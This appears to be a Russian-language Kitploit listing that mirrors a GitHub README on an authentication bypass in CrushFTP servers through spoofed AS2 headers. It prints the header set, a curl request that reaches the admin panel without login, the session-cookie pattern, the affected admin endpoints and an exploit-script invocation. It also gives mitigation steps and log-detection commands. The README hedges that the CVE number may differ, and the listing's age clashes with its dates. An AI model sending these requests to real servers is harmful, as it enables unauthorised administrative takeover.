Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CrushFTP-AS2-Bypass-Research-CVE-2025-54309 — Исследование обхода аутентификации AS2 в CrushFTP, позволяющего неавторизованный доступ администратора. Включает PoC-скрипты, правила обнаружения и технический анализ в образовательных и защитных целях. | Kitploit
Инструменты/GitHubGitHub/smileyface101/crushftp-as2-bypass-research-cve-2025-54309
Оборонительные ИнструментыАнализ уязвимостейЭксплуатацияОбход IDS/IPSЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и ОбразованиеРеагирование на Инциденты

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHubsmileyface101/crushftp-as2-bypass-research-cve-2025-54309

CrushFTP-AS2-Bypass-Research-CVE-2025-54309

Исследование обхода аутентификации AS2 в CrushFTP, позволяющего неавторизованный доступ администратора. Включает PoC-скрипты, правила обнаружения и технический анализ в образовательных и защитных целях.

Репозиторий
39 месяцев назадЕщё не проверено
Поделиться

Исследование обхода аутентификации AS2 в CrushFTP

CVSS Score Status

⚠️ ВАЖНО: Эта уязвимость была исправлена CrushFTP в ноябре 2025 года. Данное исследование публикуется только в образовательных и защитных целях.

📝 ПРИМЕЧАНИЕ: Это исследование основано на моделях уязвимостей, аналогичных CVE-2025-54309. Точный номер CVE может отличаться. Это независимое исследование безопасности, проведённое в контролируемой домашней лабораторной среде.

Об этом исследовании

Этот репозиторий документирует критическую уязвимость обхода аутентификации в серверах CrushFTP, которая позволяет получить полный административный доступ через манипуляцию заголовками AS2 (Applicability Statement 2). Уязвимость не требует аутентификации и может быть использована одним HTTP-запросом.

Ключевые моменты:

  • Исследование проведено в авторизованной домашней лаборатории (март — июль 2025)
  • Уведомление вендора (август 2025) — ответ не получен
  • Исправлено CrushFTP (ноябрь 2025)
  • Публичное раскрытие (декабрь 2025)
  • Опубликовано в образовательных и защитных целях

Исследователь: SmileyFace101 (@SmileyFace101)

🔍 Детали уязвимости

Техническое резюме

Веб-интерфейс CrushFTP ошибочно доверяет заголовкам протокола AS2 без надлежащей проверки. Сервер предполагает, что AS2-запросы уже предварительно аутентифицированы, и обходит обычные процедуры аутентификации.

Ключевые детали

  • Продукт: CrushFTP Server
  • Компонент: модуль аутентификации AS2
  • Оценочный CVSS: 9.8 (Critical)
  • Вектор атаки: манипуляция HTTP-заголовками
  • Сложность: НИЗКАЯ — один HTTP-запрос
  • Аутентификация: не требуется
  • Воздействие: полная компрометация системы
  • Связанный CVE: аналогичен CVE-2025-54309

Протестированные версии

Уязвимые версии CrushFTP (подтверждено в лаборатории):

  • CrushFTP 10.x (протестировано на ветке 10.5.x)
  • CrushFTP 11.x (протестировано на ветке 11.1.x)

Исправленные версии:

  • CrushFTP 10.7.0+ (исправлено в ноябре 2025)
  • CrushFTP 11.2.0+ (исправлено в ноябре 2025)

Лабораторная среда:

  • Операционная система: Linux (Ubuntu 22.04 LTS)
  • Тестовая инфраструктура: изолированная домашняя лабораторная сеть
  • Продакшн-системы не тестировались

Вектор атаки

root@kitploit:~
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0

Пример (лабораторная среда):

root@kitploit:~
curl -H "X-DMZ-Proxy: disabled" \
     -H "X-AS2-Version: 1.0" \
     -H "User-Agent: AS2Server/1.0" \
     "http://10.0.100.50/WebInterface/admin/index.html"

Примечание: Используйте только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.

Критическое открытие

В ходе эксплуатации мы обнаружили математическую взаимосвязь в генерации сессионных cookie, которая делает эксплуатацию 100% надёжной:

root@kitploit:~
CrushAuth Structure: [TIMESTAMP]_[SESSION_ID]
currentAuth = Last 4 characters of SESSION_ID
c2f parameter = Same as currentAuth value

� Что вы здесь найдёте

🔧 Инструменты эксплуатации

  • Полные PoC-скрипты с управлением сессиями
  • Целевое тестирование ценных конечных точек
  • Адаптивная эксплуатация с использованием множества стратегий

🔍 Обнаружение и защита

  • Правила IDS/IPS (Snort и Suricata)
  • Скрипты анализа журналов для обнаружения IOC
  • Сетевые сигнатуры для мониторинга

📖 Документация

  • Технический анализ — полный разбор уязвимости
  • Методология эксплуатации — пошаговая цепочка атак
  • Управление сессиями — обнаруженная математическая закономерность
  • JavaScript-анализ — обратная разработка клиентского кода

📊 Оценка воздействия

Аспект безопасностиУровень воздействияОписание
Конфиденциальность🔴 КРИТИЧЕСКИЙПолный доступ к учётным данным, конфигурациям, PGP-ключам, журналам
Целостность🔴 КРИТИЧЕСКИЙСоздание учётных записей, изменение конфигураций, модификация файлов
Доступность🟡 ВЫСОКИЙВыполнение системных команд, возможность нарушения работы сервиса
Повышение привилегий🔴 КРИТИЧЕСКИЙПрямой доступ администратора, создание постоянных учётных записей

Возможности после эксплуатации

✅ Полная энумерация сервера и пользователей
✅ Создание и изменение учётных записей пользователей
✅ Доступ к файловой системе и её просмотр
✅ Выполнение команд через telnet-интерфейс
✅ Планирование заданий с системными привилегиями
✅ Доступ к PGP-ключам и сертификатам
✅ Изменение административных конфигураций

🛡️ Смягчение и устранение

Немедленные действия (КРИТИЧЕСКИЕ)

  1. Обновите CrushFTP до последней версии немедленно
  2. Отключите функциональность AS2, если она не требуется
  3. Внедрите правила WAF, блокирующие AS2-заголовки из ненадёжных источников
  4. Сбросьте все административные учётные данные на серверах CrushFTP
  5. Включите MFA для административных панелей

Внедрение обнаружения

Смотрите каталог detection/ для:

  • Сигнатур IDS/IPS (Snort, Suricata)
  • Запросов анализа журналов
  • Сигнатур сетевого трафика
  • Правил обнаружения поведенческих аномалий

Долгосрочные меры безопасности

  • Внедрение многофакторной аутентификации
  • Сегментация сети для административных интерфейсов
  • Регулярные оценки безопасности
  • Внедрение принципа минимальных привилегий

📈 Обнаружение и криминалистика

Сигнатуры HTTP-трафика

root@kitploit:~
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0

Сетевые индикаторы

  • Большие HTTP-ответы (19 КБ+) от административных конечных точек без аутентификации
  • POST-запросы к /WebInterface/function/ с AS2-заголовками
  • Доступ к административной панели без предварительного входа
  • Необычные модели трафика к серверам CrushFTP

Анализ журналов

root@kitploit:~
# Web server logs
grep -E "(X-DMZ-Proxy|X-AS2-Version|AS2Server)" /var/log/nginx/access.log

# CrushFTP application logs
grep -E "(WebInterface/admin|WebInterface/function)" crushftp.log

📚 Содержимое репозитория

root@kitploit:~
.
├── README.md                          # This file - overview and usage
├── docs/
│   └── TECHNICAL_ANALYSIS.md         # Complete technical deep-dive
├── exploits/
│   ├── enhanced_session_exploit.sh   # Full exploitation with session mgmt
│   ├── targeted_exploitation.sh      # High-value endpoint testing
│   └── adaptive_exploitation.sh      # Multi-strategy approach
└── detection/
    ├── snort_rules.txt               # IDS/IPS signatures (Snort)
    ├── suricata_rules.txt            # IDS/IPS signatures (Suricata)
    └── log_analysis.sh               # Log analysis and IOC detection

Быстрый старт

  1. Ознакомьтесь с документацией:

    • Начните с этого README для общего обзора
    • Смотрите TECHNICAL_ANALYSIS.md для углублённых технических деталей
  2. Протестируйте в своей лаборатории:

    root@kitploit:~
    # Make sure you own the target system!
    ./exploits/enhanced_session_exploit.sh 10.0.100.50
    
  3. Разверните обнаружение:

    • Скопируйте правила IDS в вашу Snort/Suricata
    • Запустите скрипт анализа журналов на журналах вашего веб-сервера

🔬 Результаты исследования

Ключевые технические достижения

✅ Полный обход аутентификации AS2 обнаружен и задокументирован
✅ Критическое требование к генерации сессионных cookie выявлено и решено
✅ Математическая взаимосвязь в управлении сессиями восстановлена реверс-инжинирингом
✅ Разработана двухфазная методология эксплуатации
✅ Установлена 100% надёжная модель эксплуатации
✅ Выявлены и проанализированы множественные векторы RCE
✅ Проведён полный анализ исходного кода JavaScript

Затронутые конечные точки CrushFTP

  • /WebInterface/admin/index.html — Основная административная панель
  • /WebInterface/admin/telnet.html — Telnet-интерфейс
  • /WebInterface/Jobs/index.html — Управление заданиями
  • /WebInterface/UserManager/index.html — Управление пользователями
  • /WebInterface/PGP/index.html — Управление PGP-ключами
  • /WebInterface/function/ — Обработчик административных функций

🔗 Ссылки

  • Официальный сайт CrushFTP
  • Калькулятор CVSS 3.1
  • CWE-287: Некорректная аутентификация
  • Шпаргалка по аутентификации OWASP

👤 Автор

Автор: SmileyFace101
GitHub: @SmileyFace101
Период исследования: март — июль 2025 (домашняя лаборатория)
Публичное раскрытие: 6 декабря 2025


⚖️ Правовое и этическое уведомление

Это исследование предназначено ТОЛЬКО для ОБРАЗОВАТЕЛЬНЫХ и ЗАЩИТНЫХ целей.

✅ Разрешённое использование:

  • Исследования и обучение в области безопасности
  • Защита собственных систем
  • Авторизованное тестирование на проникновение
  • Понимание моделей атак

❌ Запрещено:

  • Несанкционированный доступ к системам
  • Тестирование систем без разрешения
  • Вредоносное использование
  • Любая незаконная деятельность

Используя это исследование, вы соглашаетесь:

  1. Использовать его только на системах, которыми вы владеете или на тестирование которых имеете письменное разрешение
  2. Соблюдать все применимые законы и нормативные акты
  3. Практиковать ответственное раскрытие информации
  4. Нести всю ответственность за свои действия

Дисклеймер: Автор не несёт ответственности за неправомерное использование. Несанкционированный доступ к компьютерным системам является незаконным.


📄 Лицензия

Лицензия MIT — Подробности в файле LICENSE.

Последнее обновление: 6 декабря 2025
Оценка риска: КРИТИЧЕСКИЙ — Требуется немедленное исправление и смягчение

Последнее обновление: 6 декабря 2025
Автор: SmileyFace101
Исследование проведено: март — июль 2025 в авторизованной лабораторной среде

Скачать инструмент